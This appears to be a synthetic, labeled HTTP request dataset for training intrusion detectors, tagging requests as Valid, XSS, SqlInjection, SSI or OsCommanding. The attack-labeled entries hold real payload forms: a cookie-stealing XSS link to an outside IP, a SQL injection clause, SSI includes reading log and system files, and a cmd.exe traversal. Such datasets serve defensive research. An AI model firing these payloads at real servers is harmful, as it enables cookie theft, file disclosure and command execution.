Warning: 093 www.ed1gi3a.shtml:52 "snve" 
X-Forwarded-For: 49.34.167.140
X-Serial-Number: 29846910
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14646
Start - Id: 12597
class: Valid
GET /ep25O5aaX/iJ3hgt/Re2/esahe/zof4erxUdFdP9Qlpm6/d@Yrcwr-c4oSY@PYGL5/isoehitxinatentav1ga/m2Gu/Dprqo/ecYV8O4xAWQUtJsP9x/uda6t.php4?uoglppgesmaeh7t=iil%40otwt6div&rnhvoeuie=ngtmpygedgeewf&tshGkh=96861&Gntoa4e2e=Ny%26u%2Ft%25s2eoeai&zm=640931173&sRdG6mrtIie=heB&29PXautoexecIB=9%2B&pr6wekaen=sm HTTP/1.0
Host: 31.12.65.156:55
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, windows-1252
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=31563
Client-ip: 139.134.8.81
Cookie: wmrytt=eardocumento&Ie;sNstblenh=0seaes2oaitThe;G8_1Z4W=brclh;9nQK@Qdfr=aleH9ewessid
Cookie2: $Version="5"
Date: Wed, 20 Dec 06 15:48:48 GMT
ETag: "9msxFVcv@1EKQ5tlu3"
Expect: 100-continue
From: Hsttkg@positcooU.be
If-Modified-Since: Fri, 01 Feb 08 19:15:36 CET
If-Unmodified-Since: Sun, 01 Aug 04 13:43:41 CET
If-Match: *
If-None-Match: "xJgacN9oS6zZe-DDJUa"
If-Range: "fsZ3xIF4nhfjOcS6pTDv"
Max-Forwards: 696
MIME-Version: 1.8
Pragma: niyhtnae='D3'
Proxy-Authorization: ohlend 5tstwcsv=aehbgNa
Authorization: Basic dnM4YWh1Om5lMnRw
Range: 6-190
Referer: /tcnenln0/lFjdbua7.asmx
TE: trailers,trailers,chunked;q=0.7
Trailer: If-Match
User-Agent: Mozilla/8.8 (Windows; U; Win 9x 1.9; ud-mi; rv:4.1.4) Gecko/41300565
UA-CPU: 68000
UA-Disp: 3446,218,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 280x609
Via: 2.8 215.71.2.5, HTTP/5.4 www.txntsge.jpeg
Transfer-Encoding: deflate
Upgrade: 3n9/9.5, ido/8.7, mo5iss/2.2
Warning: 950 23.61.199.108 "rrrlTggd8Eewtaio" 
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 3472507595174879
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12597
Start - Id: 8132
class: Valid
GET /tRsZ-Fv-NLEWzURhN4q/Rdotlse2miayolnll/FfCVtmp-I/WwJXbSDCj/no/eaMcECPeKCT6.dA.png?5bGm-nph-Pp=yi&sfya=ice&cs4decita=oir&1itrtadhcoh=300&ZqEAp.CM22yH=%25 HTTP/1.0
Host: www.mo6l.ch
Connection: close
Accept: audio/*;q=0.6, audio/basic;q=0.2, video/*;q=0.2
Accept-Charset: x-mac-chinesetrad, cp-950;q=0.7, isiri-3342;q=0.2
Accept-Encoding: compress
Accept-Language: oogeITce-lAins, mofaebyt-waek, 8ifrS2td-cmhyurhe;q=0.5, uOmT-ekleir;q=0.6, teiokT-f;q=0.2
Cache-Control: max-stale=6
Client-ip: 135.105.41.139
Cookie: crl=9165420;pu1sfFcIspouely=Ate
Cookie2: $Version="361"
Date: Wed, 15 Mar 06 16:45:37 UTC
ETag: W/"5a_z@8KhYS8Fiyr"
Expect: leTioh=medu;qatTb=3dblDve3
From: bHa9Ixr@cydbhep.be
If-Modified-Since: Wed, 27 Jun 07 03:53:25 UTC
If-Unmodified-Since: Sat, 15 Nov 08 12:49:00 GMT
If-Match: *
If-None-Match: "bOD-AwmCAnisI@TyJjL"
If-Range: Mon, 02 Feb 09 21:08:28 GMT
Max-Forwards: 2574
MIME-Version: 8.5
Pragma: ryaoar=YN1Sta
Proxy-Authorization: Digest response="2b79C4EDCA0d95fFbDfB52b2ADbdd7C0"
Authorization: NTLM ckNyOG9lbHJjeXVUb0F1dTZybmVlZWFyZWFSSWhOb3Rkc2N3T2d0aTc=
Range: 709604-1057,992-83930,5346-645
Referer: http://7it3d.de/aabi/prb8Lra.jpeg
TE: trailers,chunked,trailers
Trailer: TE
User-Agent: Mozilla/4.2 (X11; U; Open BSD i386 6.1; ja-nh; rv:9.9.1) Gecko/91734440
UA-CPU: StrongARM
UA-Disp: 515,5737,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 997x477
Via: q5oi/4.2 228.223.199.109:4, uIboud/9.0 63.175.253.12:81, 7.8 www.vaNolfsF.css
Transfer-Encoding: identity
Upgrade: hossa/8.6
Warning: 489 www.eptt.jpg "7ceEepaUoi6" "Mon, 12 Oct 09 20:07:00 CET"
X-Forwarded-For: 17.216.217.132
X-Serial-Number: 7042909990
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8132
Start - Id: 47946
class: XSS
GET /vP_SlzwcfE@CsYx.x6U/desZ8DiODJ.aspx?_aY8vchildusrT=%3Clink++++rel+%3D++++%22+++++stylesheet+++++++++%22++href++++%3D++++%22javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F80.203.123.166%2Fat.nsf%27%2Bdocument.cookie%29%3B%5D++++%22%3E HTTP/1.1
Host: www.erya.net:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: 6igpo18m-ai, bci-t3ya, 4hrsdi-nRnff;q=0.6, tnie-Soc, De-r;q=0.4
Cache-Control: no-store
Client-ip: 55.58.52.249
Cookie: zun=o$ 
Cookie2: $Version="771"
Date: Thu, 30 Aug 07 03:38:19 CET
ETag: "lT7Ksneo3lP4TiG"
Expect: 100-continue
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Wed, 08 Nov 06 17:51:17 GMT
If-Unmodified-Since: Sun, 08 Feb 04 21:36:17 UTC
If-Match: "b5yj9YO-qHQHzz.Edad"
If-None-Match: "1J-mqZ5_IBssu9kXYA"
If-Range: Tue, 04 Mar 08 04:52:56 UTC
Max-Forwards: 505
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: mbntn edar=HBooepu
Authorization: Digest qop=auth
Range: -162,92-
Referer: /tfous.swf
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/6.3 (X11; U; Linux i586 9.2; nd-lv; rv:5.8.0) Gecko/15339801
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5386x6954
Via: FTP/7.1 111.194.175.184
Transfer-Encoding: identity
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 644 www.h7jist.js:4 "esfqduza4efrwceom" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 91293701405226650926
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47946
Start - Id: 42337
class: SqlInjection
GET /8eyitln/9macFd3mtuo/6euoyaehh9teet/ritee/nazoH/9Ksamsn@p7q/rHOQLUhY0WDV/yoay.bin?UeaJektc8mrfrb=4061032586&ksacnC=1Nsw&LaOTkztte_1_=peszhk9aaaa&1tpuodko=%27++++OR+++++%27dslstw%27+++++LIKE+%27aze%2525&y0balcq=rofpGtrkslenit&rYha=%2Fsf+i&0BnXVsoTGo=paZKI-.khm&sngyhksaap1t=egn&tOdlpo9iinb=96769267&ieseNa4vsvnBf=6770451&a6erdIe=edlneknSlhetttIli&ncsX_documentboV=xydyuq9s&31orhnenmm4Ip=4237092&5oeaee=614&hernai0ltwEa=132673 HTTP/1.0
Host: www.rkdot9hn3.cz
Connection: ORuoad
Accept: video/mpeg
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 70.112.181.255
Cookie: C.yFdivhZ=fjIA>eobject %rsdwf<Uldjw;oef=n0;aezgA5aWe=49Greplace
Cookie2: $Version="3"
Date: Tue, 17 Mar 09 04:29:30 CET
ETag: W/"7R4TNu8EPA0e6Y-q"
Expect: 100-continue
From: taa7@n9I9.uk
If-Modified-Since: Thu, 05 Feb 04 05:29:01 GMT
If-Unmodified-Since: Fri, 02 Apr 10 19:23:39 CET
If-Match: *
If-None-Match: "kAFoLo6@VRtu3Cb"
If-Range: *
Max-Forwards: 168
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic ZWRhdzpsb2dFaA==
Range: -183629,81875-7
Referer: /oh9a0b/eOcwnQdi.exe
TE: gzip;q=0.6
Trailer: Accept-Encoding
User-Agent: sumzueOh1Q (hjQb5ho6; hes@Xl)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 999x243
Via: oeF/7.9 www.EAcvnsr6.jpeg:65357
Transfer-Encoding: deflate
Upgrade: tkdit/5.2
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 43766358
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42337
Start - Id: 39619
class: SSI
GET /aoe/TuVUL@rv9tupdateH5w/icsmoabthak/6deleteQ/epteoyhst7espa/grs9R7UUF7wEgsfRa/dmWZcNWX4A4eYjTu_./HnSeresenebbmooeL/aealu/vt7iwmwvnbtepkgeii/otttbOsnZrayRv4P.png?nzdawrrmlbdui=h9ksautoexecaalt473t+l&pbrEo0radprofp=5963&heeeis=908226&eorC7xcthedaceu=%3C%21--%23include+++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&o2tueim66=+zm1&gyEc=pvr.Srgxcc&Eeentge=eHdivqYw1serfitei%28prl HTTP/1.1
Host: 97.231.140.201:1268
Connection: keep-alive
Accept: audio/*, video/*, audio/x-wav
Accept-Charset: x-mac-cyrillic, iso-8859-6;q=0.9, utf-8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 79.170.36.207
Cookie: tcr=m0stgottok;nOoatezhuhM=51692
Cookie2: $Version="78"
Date: Wed, 18 Feb 04 10:41:25 CET
ETag: "KavC@_wPi-4xbzsb"
Expect: ocbQeoPi=rapwe;1eeb=ek8iwt
From: ts3vhh@kqzfn.com
If-Modified-Since: Wed, 01 Oct 08 17:21:22 GMT
If-Unmodified-Since: Thu, 07 Dec 06 14:15:59 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 09 Jun 08 06:54:48 UTC
Max-Forwards: 6000
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="a2a9"
Authorization: Digest response="80ED7f1eeBb8A0AEa6E9F90FED316EBa"
Range: 973-,-4,32221-
Referer: http://www.Ahl2it.be/ediOstZa/i60nf/capWnh/indjrra/ei4n1.gz
TE: chunked;q=0.4,deflate,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 3.3; Oc-es; rv:4.0.4) Gecko/17100424
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1841x260
Via: 9.9 203.134.160.122, HTTP/2.9 79.118.137.140, 8.9 15.6.109.22
Transfer-Encoding: gzip
Upgrade: i4uts/0.2, aesNA/6.1
Warning: 025 www.keet.tiff "mDUtinismbsS" "Thu, 13 May 04 10:01:27 GMT"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39619
Start - Id: 40
class: Valid
GET /vgtwtnitazbZkqg/pANsB9jGYr.B_umoYXDv/nNDwh_LdQtvKD/min2sn8b/Qusrwp-jzvbvQJg/k2D6PQ/dUPnCE5Yc/ers7nlsHeLusu/n-NM1_goGHO9oO.tiff?9H=tr9mVt0XQo5 HTTP/1.1
Host: 226.195.66.1
Connection: close
Accept: */*;q=0.9
Accept-Charset: windows-1257, utf-7
Accept-Encoding: gzip, identity;q=0.4, deflate, deflate, identity;q=0.5
Accept-Language: hoeaanoj-lprn;q=0.4
Cache-Control: max-stale
Client-ip: 156.145.165.171
Cookie: taddrOcxytsetD=803;ysoUeSi=94057
Cookie2: $Version="3"
Date: Thu, 27 Mar 08 24:26:26 GMT
ETag: W/"txendMFnsxCj7AS8"
Expect: 100-continue
From: T11b@lathr.st
If-Modified-Since: Sun, 18 Feb 07 21:33:25 CET
If-Unmodified-Since: Sun, 09 Nov 08 22:24:40 GMT
If-Match: "@Af-u8gJq.Ffs@wlaS"
If-None-Match: *
If-Range: Wed, 17 Mar 10 01:19:41 UTC
Max-Forwards: 578
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="qbAila"
Authorization: mmujew itnl=lssehhr8
Range: -54670
Referer: /zEiooht.asmx
TE: gzip,trailers
Trailer: From
User-Agent: Mozilla/1.8 (X11; U; Linux i586 0.8; ig-Hh; rv:9.6.1) Gecko/07675060
UA-CPU: PowerPC
UA-Disp: 4994,968,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2292x8708
Via: 9.3 249.7.13.238
Transfer-Encoding: identity
Upgrade: ntyhts/3.8
Warning: 232 www.AlaosaP.html "peaiso" "Tue, 27 Oct 09 21:12:39 CET"
X-Forwarded-For: 242.13.127.96
X-Serial-Number: 436492
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40
Start - Id: 33609
class: Valid
PUT /sCrdutdhsAaess/8ftrUhdolittn/FdeleteYperlz1Dm-N5D@object7/c6yzAhH5s7aybO/1CvuoptdON/a_UxFZs/lyAnqX1Uymw0Ej/Kr/4Eqei4xtxa/cdgQd/aKoH.jpg? HTTP/1.1
Content-Length: 248
Content-Language: t6i
Content-Encoding: identity
Content-Location: http://gte2sv.com/lnSht/ntrSS/aeuvdnnz/owete.mdb
Content-MD5: c3NLaWxlZW5wZWVwZXNvdw==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 22 Feb 05 21:08:29 UTC
Host: 232.225.55.126:637
Connection: keep-alive
Accept: video/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=58
Client-ip: 93.241.118.177
Cookie: Rhas2=e servicesn;30DinputtJboot.ini=r]Es?;omb2rmsRNo=eSxMviU9U;ashnhrn4femg=n+n;zPjh1connectCJYV=gesehl8orrmrIitu
Cookie2: $Version="82"
Date: Sat, 26 Jul 08 14:08:34 GMT
If-Modified-Since: Sun, 16 Mar 08 06:57:45 UTC
If-Match: *
Max-Forwards: 8792
MIME-Version: 0.2
Pragma: cwni8=th
Authorization: Digest nonce
Range: 409459-7,-297771
Referer: /i0sstSCk/f4msb/bhbddf/enivut/3segi8.txt
TE: deflate;q=0.2,gzip;q=0.9,gzip
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 7.0; ks-eY; rv:8.8.6) Gecko/44646918
Via: nir9/4.4 www.3eta.gif:0, adn/3.5 232.56.51.75
Transfer-Encoding: compress
Warning: 832 www.ehihKame.gif "khIC0" 
X-Forwarded-For: 246.11.40.158

OezegnTorIs=eo&Qns=2814361&7vntjwfsyEnehfo=79&nei=00JSYGDDTUdw&sretNTTsgv=668&hhh2r5mo8=kolinehu&iaeortDitzai=0&pdealqe8li=1411&hnaieypunbcsn4r=06&re4ezrini8igrh=to ese %umt&lb1eImsFnkaoM=034842&acceptQgOE0selectcC=24073133&dtoisas4phrteb=zMh4le0

End - Id: 33609
Start - Id: 32838
class: Valid
POST /oewoearnhaon85ee/eadeetmwor2y/uKJaCz@i6O.PJn/oayaeucnc0iih.cgi? HTTP/1.0
Content-Length: 55
Content-Language: eso,omoaxkha
Content-Encoding: identity
Content-Location: http://beDmrhvh.biz/giwit/i1heo/83ab/ji4h/noGfl.jsp
Content-MD5: c25lcHB2b2I0c2hhYUFOaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 23 Apr 06 19:16:44 GMT
Last-Modified: Sat, 24 Feb 07 07:47:18 UTC
Host: 68.188.117.160:52
Connection: oas3tnBr
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, deflate;q=0.7
Accept-Language: *
Cache-Control: max-stale=0461
Client-ip: 50.137.205.249
Cookie: tsenzce=rpstrpassthruectprocessing-instructionew3tm;sB5helmksrgzben=rntilsPnsnuchytn;3k0z2=lsnshdaahyO;e;a2aLuuiolcmo=h5e;3tererxrldiua=u;powa?alusqdt;G2openYFo=uh@'Tcojkntmp4z
Cookie2: $Version="941"
Date: Thu, 05 Feb 09 04:06:08 UTC
ETag: W/"vMrX72kMrZGrBQElRq"
Expect: rdlslz=jdHI;ep23s4a=epna0to
From: hqso@atPmE.de
If-Modified-Since: Sat, 22 Aug 09 03:07:00 GMT
If-Unmodified-Since: Wed, 28 Apr 04 15:35:43 CET
If-Match: *
If-None-Match: "GF@HzB6A28X-_t92kpfx"
If-Range: Sun, 25 Nov 07 16:47:31 GMT
Max-Forwards: 68
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic N1l0QTY6bnV5bmhnbw==
Authorization: Basic b2xlQTpiZWZiemF0
Range: 2086-1,90-
Referer: /eaadu.tiff
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: oordzJszo
UA-CPU: x86
UA-Disp: 1558,006,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 968x4170
Via: sai/5.9 www.qvlag.htm
Transfer-Encoding: identity
Upgrade: d8jw0/9.1
Warning: 745 www.ku9qt.css "titchlb" 
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

hKRr9oee=n4tne&ym0yelayiienam=9588066&larVahnlj0=947750

End - Id: 32838
Start - Id: 12713
class: Valid
GET /elq0D336JyHfTH6921/6fsBzb4ZnfzWvDW/HHperlDtqYqFWnwVautoexecZ/lr6ususobI.jpeg?VYTCRcMIp2U=6tryctacceptpdsall8en%29+all&pUree=2421683&5Duhot6dzldlrf=137&0democsujuett=44&to9vwrjmmco=6uKtI2xT%402kr&aheioun=sewed2awo&JY3bO=69712492&moshmhRostu=ds5Eg9e&1L3_gpasswdRT=1&OHak8l3no=vbscriptsc&qZY4boot.inib3xszrdiv=7715851&bs3hN50yaesCmAE=18125748 HTTP/1.1
Host: www.eoeeueu.ch
Connection: 0zPsen7
Accept: text/xml, audio/*;q=0.3, application/postscript;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 198.18.145.34
Cookie: eaa2sSa=estm4;rhaef0afr=114259
Cookie2: $Version="01"
Date: Sat, 22 Sep 07 20:34:38 GMT
ETag: W/"d9S.r3fKIS6Fljpo18Q"
Expect: 100-continue
From: aIsia@oetle.org
If-Modified-Since: Wed, 08 Feb 06 02:40:42 UTC
If-Unmodified-Since: Thu, 25 Nov 04 11:33:24 CET
If-Match: "F4Lsa8L0KvHF0j8Eo"
If-None-Match: *
If-Range: Thu, 23 Nov 06 23:48:57 GMT
Max-Forwards: 7
MIME-Version: 9.1
Pragma: nah=eiU
Proxy-Authorization: NTLM Z2huZTZwcmlldG84d2Vpc2VhZDNpZ25lZmhmZWVlbHRlZGxhOGFn
Authorization: NTLM YWNsN2Vpb0k5czRMaWUzMWNMb2VidWplQW5hZWFlaHRmN0FoZWk0c3R0ZEc5Zg==
Range: 9092-,513-7
Referer: /xcdrh5nr/ihetf/ibfo/lua4.tar
TE: trailers,gzip,chunked;q=0.2
Trailer: Accept-Charset
User-Agent: ywOhtNcNcu http://www.te0Hi8T.net
UA-CPU: Sparc
UA-Disp: 753,2579,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 780x3609
Via: xaR/9.7 213.86.163.172
Transfer-Encoding: refi4; iodctlf=Lsktqtr
Upgrade: aao1rt/4.8, oho4/0.3, ln3tas/2.5
Warning: 566 www.iaages.png "ihfood" "Thu, 27 Jan 05 04:38:01 CET"
X-Forwarded-For: 227.241.172.23
X-Serial-Number: 91220427481224
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12713
Start - Id: 5020
class: Valid
POST /YO.html? HTTP/1.1
Content-Length: 107
Content-Language: nra,ifel0tj
Content-Encoding: deflate
Content-Location: /iHfa/snfUee.css
Content-MD5: bHJJZXRhaGhpaWR0dG9lYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Apr 04 21:33:51 GMT
Last-Modified: Mon, 19 Feb 07 20:57:16 GMT
Host: www.tnentd.com:6
Connection: keep-alive
Accept: video/mpeg;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 162.231.248.117
Cookie: E@l-3ESoIRTM=rprvu9tHaaue
Cookie2: $Version="23"
Date: Tue, 21 Oct 08 05:22:53 GMT
ETag: "I7MGgHbUxda9tdAq.M@x"
Expect: rjidLy=lcseE5h
From: anypee@kdrqiteI.it
If-Modified-Since: Tue, 17 Jan 06 22:36:04 GMT
If-Unmodified-Since: Fri, 12 Jun 09 13:49:53 CET
If-Match: "PDBxk8x-Q1fv_hqIiQc"
If-None-Match: *
If-Range: Sat, 07 May 05 03:10:28 UTC
Max-Forwards: 92
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: -1617,797207-,93795-67
Referer: /iil8.js
TE: deflate
Trailer: Trailer
User-Agent: Mozilla/4.2 (Machintosh; U; PPC 4.7; ro-ee; rv:8.7.4) Gecko/24799223
UA-CPU: StrongARM
UA-Disp: 5033,2774,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8269x495
Via: 0.8 192.37.25.34:0
Transfer-Encoding: gzip
Upgrade: zcci/6.6, nahgit/2.1, zBd/1.0
Warning: 847 www.cs4tji.gif:1579 "ciCj6llogyAnxa" "Fri, 13 Oct 06 21:39:00 GMT"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 03530
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

iyhnarsatei0=2Ceuh&ufNseu3N=orzqanTu&Jy3PDCzD=towdittscndtnuea&oae91rI=nsts3djrl@dn&tzioc=59&me=201653283

End - Id: 5020
Start - Id: 40447
class: SSI
GET /itgrfOslswoaosennirt/snW/isiait25eOnpeeamnsoo.mdb?hntvt74eT=%3C%21--+%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++++--%3E&enedlxu7idun=iR5tomihscripto%2763sl&graWgtdis=755518&Rlxe1Ysw=tyn%5CiSceert&yLWc-=xcam&molEkicrsEgem=63475666&l2qsm=482&6oaraLededhei=dnsosumK HTTP/1.1
Host: www.pyidwv.cz
Connection: ghyntge
Accept: */*
Accept-Charset: iso-8859-4;q=0.5
Accept-Encoding: identity, compress
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 72.82.95.101
Cookie: ikry71rli=peoma3eEcf4leb
Cookie2: $Version="879"
Date: Sat, 22 Aug 09 04:10:30 UTC
ETag: W/"VV0zyI0DX0STgMmQ34h"
Expect: 100-continue
If-Modified-Since: Thu, 11 Dec 08 10:35:25 GMT
If-Unmodified-Since: Wed, 20 Sep 06 05:28:12 CET
If-Match: *
If-None-Match: "Rku@O.tZCM7jQAR"
If-Range: "dRvIvZRddlTCwMD7U"
Max-Forwards: 3
MIME-Version: 3.0
Pragma: atx='wnt5'
Proxy-Authorization: 2eg8q 4ltgtAr9=na5Ilsmg
Authorization: NTLM aW9yaWF4ZTN2UXptdHFobHNhaWZ0YW5hbm5lSWwwZHdyd2NwZg==
Range: 648391-0593,082-86156,297927-83
Referer: /ewiRa4ir/leoa/esTst.asp
TE: trailers
Trailer: Transfer-Encoding
User-Agent: osrOeaa (8sdECSRCz; 5Ie@MQ; o6vnNZ; a2J85.y)
UA-CPU: 68000
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4401x4707
Via: FTP/2.7 www.mmasts3.js, ieetms/2.7 93.86.91.135, 1.8 www.aSsi.tiff:3
Transfer-Encoding: nUlIti; Tais=rntlhRe
Upgrade: Fet/1.1, nsHe/6.2
Warning: 037 www.zncew.jpg "u3loce3odp3oeC" 
X-Forwarded-For: 211.36.21.124
X-Serial-Number: 9011770
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 40447
Start - Id: 17822
class: Valid
GET /aa7netSmsMsiaer/hel6Kw@i4ec/y_qa5k.png?n3auie=o1intfs4j%25eepftc&pd=526115&fsltthl8i=d9ride&96rirlit0s2fe=99076489&lewetihnd=sgiash3pehhseibn2&wiantantirhur=sbnh&cpDtiit3=vN9cunionicn&Dheticsh=%25ucopytirdrr4%3C&xp_2iV3=142Dh&paafwrdshk=z._8o&e2Janei5gd=711849&sBaetmhrtbiOhs=dnvprocessing-instructionaTyservicest&zbgsoundwp-4R9v.cmdY=iptu&dalieue3ezeoaio=e1SnhJ&d-Mk@1qHS=45 HTTP/1.1
Host: 180.86.34.171:98064
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 5c-r;q=0.9, 2piU-baQeyir, teeomN-raLoi;q=0.2, Rif7MGn-dterr
Cache-Control: max-age=0
Client-ip: 161.131.239.25
Cookie: SnOeuy=a;ooevOtrmul9r=otrnke;fiatpw5fqro0=Davrbinftv
Cookie2: $Version="799"
Date: Wed, 09 Apr 08 02:30:09 CET
ETag: "b2Nd2bCIwJpI9gkeg9"
Expect: ugelm
From: khupg@oosaf.ch
If-Modified-Since: Fri, 09 Feb 07 22:51:55 GMT
If-Unmodified-Since: Sat, 22 Jul 06 10:08:00 GMT
If-Match: "BCvjVOGbXs2r1sNIt"
If-None-Match: *
If-Range: Fri, 13 Feb 04 15:42:09 UTC
Max-Forwards: 197
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=tltboDwn
Range: 4-20674
Referer: /ffRiaeoa/kyrle/ftrasx/sywdDvc/cn0htyuj.css
TE: trailers,trailers
Trailer: Pragma
User-Agent: psmrblaROtt0eeleubs
UA-CPU: StrongARM
UA-Disp: 2638,7610,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5851x4890
Via: 9.6 126.182.27.195
Transfer-Encoding: gzip
Upgrade: 0e1dxo/9.3, 9olo/5.1
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 7.104.70.87
X-Serial-Number: 168409741956
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17822
Start - Id: 44127
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.hyecipbeKn.be:4
Connection: fesohd85
Accept: */*;q=0.8
Accept-Charset: x-mac-chinesesimp;q=0.4, iso-8859-5, windows-1258
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 196.173.120.66
Cookie: peUbytZof8ossas=0751;KeO3n=\cr
Cookie2: $Version="066"
Date: Fri, 06 Mar 09 14:41:33 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Fri, 21 May 04 16:42:07 CET
If-Unmodified-Since: Thu, 05 Jan 06 13:32:56 GMT
If-Match: "uyPE5HkkTKbicCYJ"
If-None-Match: *
If-Range: *
Max-Forwards: 345
MIME-Version: 2.6
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: Digest realm
Range: 2856-325921,765830-7785,3752-597
Referer: /sebtshd/nurLse7n.jsp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ncefa6sole64s
UA-CPU: 68000
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: FTP/0.0 www.t2actsl.png, 1.6 www.etndo.gif, 5.6 187.24.170.221
Transfer-Encoding: deflate
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 436 88.16.203.181 "fcfDrdodlimhhiie" 
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44127
Start - Id: 28303
class: Valid
GET /5ydEyeoteAcz/ohXqg3Dn9YScT4DnwB/cG7/eMBDTUrrsvXf/efY9d6v-0O/Zvaoo1remnse3/uH/Rroql39No2nh.jsp?iHeR=1082570287&iDtiB9rri=cr&OmzDao=044&ce=s6trk%2Fe+d&fniot2tn4=lKaenh+wp-a%7Cwdewiiis&O3e=t2ri1&aeoo0s=00477252&bd=idinuhtscd9&htLanhtUdoe=c&osniYon2=Omce+mceln%254c+theeu&pMfYNfechoD=4&LeOtuiiocA=56892501&d58s0e=710 HTTP/1.0
Host: www.zqrdstc.net
Connection: close
Accept: audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.3, deflate;q=0.2
Accept-Language: eh-l;q=0.1, oo6its-d
Cache-Control: only-if-cached
Client-ip: 247.3.141.125
Cookie: 5tGIseaeiIn=06;_zeRtV7.Dp58=6nes(vetfwtt
Cookie2: $Version="05"
Date: Sat, 21 Feb 04 21:52:56 UTC
ETag: W/"SI.HT8uThZ9rmizD"
Expect: 100-continue
From: aweet@rur7diaiol.de
If-Modified-Since: Tue, 27 Dec 05 10:50:36 UTC
